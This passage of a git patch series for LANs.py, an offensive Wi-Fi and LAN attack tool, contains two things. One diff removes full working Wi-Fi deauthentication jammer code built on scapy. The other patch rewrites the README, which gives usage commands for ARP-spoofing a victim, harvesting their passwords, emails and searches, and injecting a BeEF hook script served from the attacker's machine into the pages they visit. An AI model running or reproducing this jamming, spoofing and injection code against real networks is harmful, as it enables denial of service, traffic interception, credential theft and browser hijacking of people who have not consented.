W + '] No wireless interfaces found, bring one up and try again') - if len(interfaces) == 1: - for interface in interfaces: - return interface - - # Find most powerful interface - for iface in interfaces: - count = 0 - proc = Popen(['iwlist', iface, 'scan'], stdout=PIPE, stderr=DN) - for line in proc.communicate()[0].split('\n'): - if ' - Address:' in line: # first line in iwlist scan for a new AP - count += 1 - scanned_aps.append((count, iface)) - print '[' + G + '+' + W + '] Networks discovered by ' + G + iface + W + ': ' + T + str(count) + W - try: - interface = max(scanned_aps)[1] - print '[' + G + '+' + W + '] ' + interface + " chosen. Is this ok? [Enter=yes] " - input = raw_input() - if input == "" or input == "y" or input == "Y" or input.lower() == "yes": - return interface - else: - interfaceInput = raw_input("What interface would you like to use instead? ") - if interfaceInput in interfaces: - return interfaceInput - else: - print '[' + R + '!' + W + '] Exiting: Invalid Interface!' - except Exception as e: - for iface in interfaces: - interface = iface - print '[' + R + '-' + W + '] Minor error:', e - print ' Starting monitor mode on ' + G + interface + W - return interface - - -def start_mon_mode(interface): - print '[' + G + '+' + W + '] Starting monitor mode off ' + G + interface + W - try: - os.system('ifconfig %s down' % interface) - os.system('iwconfig %s mode monitor' % interface) - os.system('ifconfig %s up' % interface) - return interface - except Exception: - sys.exit('[' + R + '-' + W + '] Could not start monitor mode') - - -def remove_mon_iface(mon_iface): - os.system('ifconfig %s down' % mon_iface) - os.system('iwconfig %s mode managed' % mon_iface) - os.system('ifconfig %s up' % mon_iface) - - -def mon_mac(mon_iface): - ''' - http://stackoverflow.com/questions/159137/getting-mac-address - ''' - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', mon_iface[:15])) - mac = ''.join(['%02x:' % ord(char) for char in info[18:24]])[:-1] - print '[' + G + '*' + W + '] Monitor mode: ' + G + mon_iface + W + ' - ' + O + mac + W - return mac - - -def channel_hop(mon_iface, args): - ''' - First time it runs through the channels it stays on each channel for 5 seconds - in order to populate the deauth list nicely. After that it goes as fast as it can - ''' - global monchannel, first_pass - DN = open(os.devnull, 'w') - channelNum = 0 - err = None - while 1: - if args.channel: - with lock: - monchannel = args.channel - else: - channelNum += 1 - if channelNum > 11: - channelNum = 1 - with lock: - first_pass = 0 - with lock: - monchannel = str(channelNum) - - proc = Popen(['iw', 'dev', mon_iface, 'set', 'channel', monchannel], stdout=DN, stderr=PIPE) - for line in proc.communicate()[1].split('\n'): - if len(line) > 2: # iw dev shouldnt display output unless there's an error - err = '[' + R + '-' + W + '] Channel hopping failed: ' + R + line + W - - output(err, monchannel) - if args.channel: - time.sleep(.05) - else: - # For the first channel hop thru, do not deauth - if first_pass == 1: - time.sleep(1) - continue - - deauth(monchannel) - - -def deauth(monchannel): - ''' - addr1=destination, addr2=source, addr3=bssid, addr4=bssid of gateway if there's - multi-APs to one gateway. Constantly scans the clients_APs list and - starts a thread to deauth each instance - ''' - - pkts = [] - - if len(clients_APs) > 0: - with lock: - for x in clients_APs: - client = x[0] - ap = x[1] - ch = x[2] - # Can't add a RadioTap() layer as the first layer or it's a malformed - # Association request packet? - # Append the packets to a new list so we don't have to hog the lock - # type=0, subtype=12? - if ch == monchannel: - deauth_pkt1 = Dot11(addr1=client, addr2=ap, addr3=ap) / Dot11Deauth() - deauth_pkt2 = Dot11(addr1=ap, addr2=client, addr3=client) / Dot11Deauth() - pkts.append(deauth_pkt1) - pkts.append(deauth_pkt2) - if len(APs) > 0: - if not args.directedonly: - with lock: - for a in APs: - ap = a[0] - ch = a[1] - if ch == monchannel: - deauth_ap = Dot11(addr1='ff:ff:ff:ff:ff:ff', addr2=ap, addr3=ap) / Dot11Deauth() - pkts.append(deauth_ap) - - if len(pkts) > 0: - # prevent 'no buffer space' scapy error http://goo.gl/6YuJbI - if not args.timeinterval: - args.timeinterval = 0 - if not args.packets: - args.packets = 1 - - for p in pkts: - send(p, inter=float(args.timeinterval), count=int(args.packets)) - - -def output(err, monchannel): - os.system('clear') - mon_iface = get_mon_iface(args) - if err: - print err - else: - print '[' + G + '+' + W + '] ' + mon_iface + ' channel: ' + G + monchannel + W + '\n' - if len(clients_APs) > 0: - print ' Deauthing ch ESSID' - # Print the deauth list - with lock: - for ca in clients_APs: - if len(ca) > 3: - print '[' + T + '*' + W + '] ' + O + ca[0] + W + ' - ' + O + ca[1] + W + ' - ' + ca[2].ljust( - 2) + ' - ' + T + ca[3] + W - else: - print '[' + T + '*' + W + '] ' + O + ca[0] + W + ' - ' + O + ca[1] + W + ' - ' + ca[2] - if len(APs) > 0: - print '\n Access Points ch ESSID' - with lock: - for ap in APs: - print '[' + T + '*' + W + '] ' + O + ap[0] + W + ' - ' + ap[1].ljust(2) + ' - ' + T + ap[2] + W - print '' - - -def noise_filter(skip, addr1, addr2): - # Broadcast, broadcast, IPv6mcast, spanning tree, spanning tree, multicast, broadcast - ignore = ['ff:ff:ff:ff:ff:ff', '00:00:00:00:00:00', '33:33:00:', '33:33:ff:', '01:80:c2:00:00:00', '01:00:5e:', - mon_MAC] - if skip: - ignore.append(skip) - for i in ignore: - if i in addr1 or i in addr2: - return True - - -def cb(pkt): - ''' - Look for dot11 packets that aren't to or from broadcast address, - are type 1 or 2 (control, data), and append the addr1 and addr2 - to the list of deauth targets. - ''' - global clients_APs, APs - - # return these if's keeping clients_APs the same or just reset clients_APs? - # I like the idea of the tool repopulating the variable more - if args.maximum: - if args.noupdate: - if len(clients_APs) > int(args.maximum): - return - else: - if len(clients_APs) > int(args.maximum): - with lock: - clients_APs = [] - APs = [] - - # We're adding the AP and channel to the deauth list at time of creation rather - # than updating on the fly in order to avoid costly for loops that require a lock - if pkt.haslayer(Dot11): - if pkt.addr1 and pkt.addr2: - - # Filter out all other APs and clients if asked - if args.accesspoint: - if args.accesspoint not in [pkt.addr1, pkt.addr2]: - return - - # Check if it's added to our AP list - if pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeResp): - APs_add(clients_APs, APs, pkt, args.channel) - - # Ignore all the noisy packets like spanning tree - if noise_filter(args.skip, pkt.addr1, pkt.addr2): - return - - # Management = 1, data = 2 - if pkt.type in [1, 2]: - clients_APs_add(clients_APs, pkt.addr1, pkt.addr2) - - -def APs_add(clients_APs, APs, pkt, chan_arg): - ssid = pkt[Dot11Elt].info - bssid = pkt[Dot11].addr3 - try: - # Thanks to airoscapy for below - ap_channel = str(ord(pkt[Dot11Elt:3].info)) - # Prevent 5GHz APs from being thrown into the mix - chans = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11'] - if ap_channel not in chans: - return - - if chan_arg: - if ap_channel != chan_arg: - return - - except Exception as e: - return - - if len(APs) == 0: - with lock: - return APs.append([bssid, ap_channel, ssid]) - else: - for b in APs: - if bssid in b[0]: - return - with lock: - return APs.append([bssid, ap_channel, ssid]) - - -def clients_APs_add(clients_APs, addr1, addr2): - if len(clients_APs) == 0: - if len(APs) == 0: - with lock: - return clients_APs.append([addr1, addr2, monchannel]) - else: - AP_check(addr1, addr2) - - # Append new clients/APs if they're not in the list - else: - for ca in clients_APs: - if addr1 in ca and addr2 in ca: - return - - if len(APs) > 0: - return AP_check(addr1, addr2) - else: - with lock: - return clients_APs.append([addr1, addr2, monchannel]) - - -def AP_check(addr1, addr2): - for ap in APs: - if ap[0].lower() in addr1.lower() or ap[0].lower() in addr2.lower(): - with lock: - return clients_APs.append([addr1, addr2, ap[1], ap[2]]) - - -def stop(signal, frame): - if monitor_on: - sys.exit('\n[' + R + '!' + W + '] Closing') - else: - remove_mon_iface(mon_iface) - sys.exit('\n[' + R + '!' + W + '] Closing') - -############################# -#####End wifijammer Code##### -############################# - if __name__ == "__main__": if not os.geteuid() == 0: @@ -1596,8 +1216,5 @@ if __name__ == "__main__": if args.pcap: pcap_handler(args) exit('[-] Finished parsing pcap file') - - if args.jam: - wifijammerMain(args) else: LANsMain(args) From 03dac5eab2878056622fac8d7c04a9d65af57a05 Mon Sep 17 00:00:00 2001 From: Daniel Date: Fri, 8 Sep 2017 15:18:47 +0200 Subject: [PATCH 17/17] General improvements * Greatly improved formatting (code snippets for flags and others) * Consistent 'hash' formatting for markdown * Improved grammar, spelling --- README.md | 148 +++++++++++++++++++++++++++--------------------------- 1 file changed, 73 insertions(+), 75 deletions(-) diff --git a/README.md b/README.md index cd5aad2..43ab9d2 100644 --- a/README.md +++ b/README.md @@ -1,7 +1,6 @@ If you have any issues running this script I'd suggest checking out [MITMf](https://github.com/byt3bl33d3r/MITMf) which does all the same things + more. Eventually this script needs to be rewritten with net-creds as the engine. -LANs.py -======== +# LANs.py * Automatically find the most active WLAN users then spy on one of them and/or inject arbitrary HTML/JS into pages they visit. * Individually poisons the ARP tables of the target box, the router and the DNS server if necessary. Does not poison anyone else on the network. Displays all most the interesting bits of their traffic and can inject custom html into pages they visit. Cleans up after itself. @@ -9,14 +8,23 @@ LANs.py * Also can be used to continuously jam nearby WiFi networks. This has an approximate range of a 1 block radius, but this can vary based off of the strength of your WiFi card. This can be fine-tuned to allow jamming of everyone or even just one client. Cannot jam WiFi and spy simultaneously. -Prerequisites: Linux, python-scapy, python-nfqueue (nfqueue-bindings 0.4-3), aircrack-ng, python-twisted, BeEF (optional), nmap, nbtscan, tcpdump, and a wireless card capable of promiscuous mode if you don't know the IP of your target. - -Tested on Kali. In the following examples 192.168.0.5 will be the attacking machine and 192.168.0.10 will be the victim. +### Prerequisites: +- Linux
+- `python-scapy`
+- `python-nfqueue` (nfqueue-bindings 0.4-3)
+- `aircrack-ng`
+- `python-twisted`
+- `nmap`
+- `nbtscan`
+- `tcpdump`
+- a wireless card capable of promiscuous mode if you don't know the target's IP address
+- [optional] `BeEf`
+Tested on Kali Linux. In the following examples, 192.168.0.5 will be the attacking machine and 192.168.0.10 will be the victim. All options: -``` shell +```shell Python LANs.py [-h] [-b BEEF] [-c CODE] [-u] [-ip IPADDRESS] [-vmac VICTIMMAC] [-d] [-v] [-dns DNSSPOOF] [-a] [-set] [-p] [-na] [-n] [-i INTERFACE] [-r REDIRECTTO] [-rip ROUTERIP] @@ -25,41 +33,39 @@ Python LANs.py [-h] [-b BEEF] [-c CODE] [-u] [-ip IPADDRESS] [-vmac VICTIMMAC] [--directedonly] [--accesspoint ACCESSPOINT] ``` -#Usage ------ +### Usage + #### Common usage: - -``` shell +```shell python LANs.py -u -p ``` -Active target identification which ARP spoofs the chosen target and outputs all the interesting non-HTTPS data they send or request. There's no -ip option so this will ARP scan the network, compare it to a live running promiscuous capture, and list all the clients on the network. Attempts to tag the targets with a Windows netbios name and prints how many data packets they are sending/receiving. The ability to capture data packets they send is very dependent on physical proximity and the power of your network card. Ctrl-C when you're ready and pick your target which it will then ARP spoof. +Active target identification which ARP spoofs the chosen target and outputs all the interesting non-HTTPS data they send or request. There's no `-ip` option so this will ARP scan the network, compare it to a live running promiscuous capture, and list all the clients on the network. Attempts to tag the targets with a Windows netbios name and prints how many data packets they are sending/receiving. The ability to capture data packets they send is very dependent on physical proximity and the power of your network card. Ctrl-C when you're ready and pick your target which it will then ARP spoof. -Supports interception and harvesting of data from the following protocols: HTTP, FTP, IMAP, POP3, IRC. Will print the first 135 characters of URLs visited and ignore URLs ending in .jpg, .jpeg, .gif, .css, .ico, .js, .svg, and .woff. Will also print all protocol username/passwords entered, searches made on any site, emails sent/received, and IRC messages sent/received. Screenshot: http://i.imgur.com/kQofTYP.png +--- -Running LANs.py without argument will give you the list of active targets and upon selecting one, it will act as a simple ARP spoofer. +Supports interception and harvesting of data from the following protocols: HTTP, FTP, IMAP, POP3, IRC. Will print the first 135 characters of URLs visited and ignore URLs ending in .jpg, .jpeg, .gif, .css, .ico, .js, .svg, and .woff. Will also print all protocol username/passwords entered, searches made on any site, emails sent/received, and IRC messages sent/received. [Screenshot](http://i.imgur.com/kQofTYP.png) -### Another common usage: +Running `LANs.py` without argument will give you the list of active targets and upon selecting one, it will act as a simple ARP spoofer. -``` shell +#### Other common usage: +```shell python LANs.py -u -p -d -ip 192.168.0.10 ``` --d: open an xterm with driftnet to see all images they view - --ip: target this IP address and skip the active targeting at the beginning +`-d`: open an xterm with driftnet to see all images they view
+`-ip`: target this IP address and skip the active targeting at the beginning #### HTML injection: - -``` shell +```shell python LANs.py -b http://192.168.0.5:3000/hook.js ``` -Inject a BeEF hook URL (http://beefproject.com/, tutorial: http://resources.infosecinstitute.com/beef-part-1/) into pages the victim visits. This just wraps the argument in `